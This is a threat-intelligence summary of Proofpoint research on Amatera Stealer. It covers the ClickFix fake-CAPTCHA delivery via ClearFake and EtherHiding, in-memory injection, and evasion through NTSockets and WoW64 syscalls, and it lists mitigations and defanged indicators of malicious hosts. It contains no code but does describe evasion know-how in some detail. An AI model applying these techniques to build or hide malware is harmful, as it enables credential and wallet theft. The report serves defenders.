Advanced Web Injection and Anti-Analysis Tactics Used to Deliver Amatera Stealer

Proofpoint researchers have uncovered advanced campaigns distributing Amatera Stealer – a rebranded evolution of ACR Stealer through compromised websites.

The malware leverages ClearFake web injects, where legitimate sites are hijacked to load malicious scripts via EtherHiding (hosting payloads on Binance Smart Chain contracts). This initiates a multi-stage attack:

1. Victims encounter fake CAPTCHA overlays urging “human verification”
2. Users are socially engineered into pressing Win+R and pasting malicious PowerShell commands
3. The script downloads a .csproj file that executes obfuscated PowerShell payloads
4. Final-stage shellcode (generated via Clematis tool) deploys Amatera Stealer using Early Bird + Context Hijack injection – suspending legitimate processes (e.g., OpenWith.exe) to execute malware in memory.

This technique bypasses traditional file scanning and leverages Windows’ native tools (msbuild.exe, PowerShell) for stealth.

Next-Gen Evasion: NTSockets and WoW64 Syscalls

Amatera employs groundbreaking analysis features to evade detection:

• NTSockets Communication:
  Bypasses standard networking APIs by directly interfacing with \\Device\\Afd\\Endpoint. This hides C2 traffic from most EDR solutions, as it avoids Winsock hooks. Samples connect to Cloudflare IPs with unresolvable hostnames (e.g., overplanteasiest[.]top), complicating blocklists.
• WoW64 Syscalls:
  Dynamically resolves Native API addresses, extracts System Service Numbers (SSNs), and invokes syscalls via WoW64Transition. This:
  • Bypasses user-mode API hooking
  • Uses modified djb2 hashing to locate NTDLL functions
  • Executes syscalls for critical operations (file/process manipulation)

Modular Payloads and Updated C2 Infrastructure

Unlike its predecessor, Amatera:

• Ditches Steam/Telegram dead drops for direct IP-based C2
• Retrieves JSON configuration via HTTP(S), enabling:
  • Customized data theft (browsers, crypto wallets, messenger apps)
  • Secondary payload execution (.exe, .ps1, .dll via ShellExecuteA or IEX)
• Supports HTTPS C2 with Schannel API integration (e.g., amaprox[.]icu)

Recent samples include a “ld” (load) JSON key to fetch additional malware.

Mitigation Recommendations

1. Block PowerShell execution for standard users
2. Monitor for msbuild.exe spawning uncommon child processes
3. Inspect network traffic to CDN IPs with invalid hostnames
4. Hunt for \\Device\\Afd\\Endpoint socket connections
5. Educate users on “ClickFix” social engineering (Windows Run dialog misuse)

IOC Highlights

• IPs: 104.21.80[.]1, 172.67.178[.]5
• Domains: amaprox[.]icu, b1[.]talismanoverblown[.]com
• Hashes: 120316ecaf06b76a564ce42e11f7074c52df6d79b85d3526c5b4e9f362d2f1c2 (Amatera)

Amatera exemplifies the industrial evolution of stealers – combining web compromises, memory residency, and kernel-level evasion for persistent data theft.

As Lumma Stealer’s dominance wanes, this MaaS is positioned for increased adoption among cybercriminals.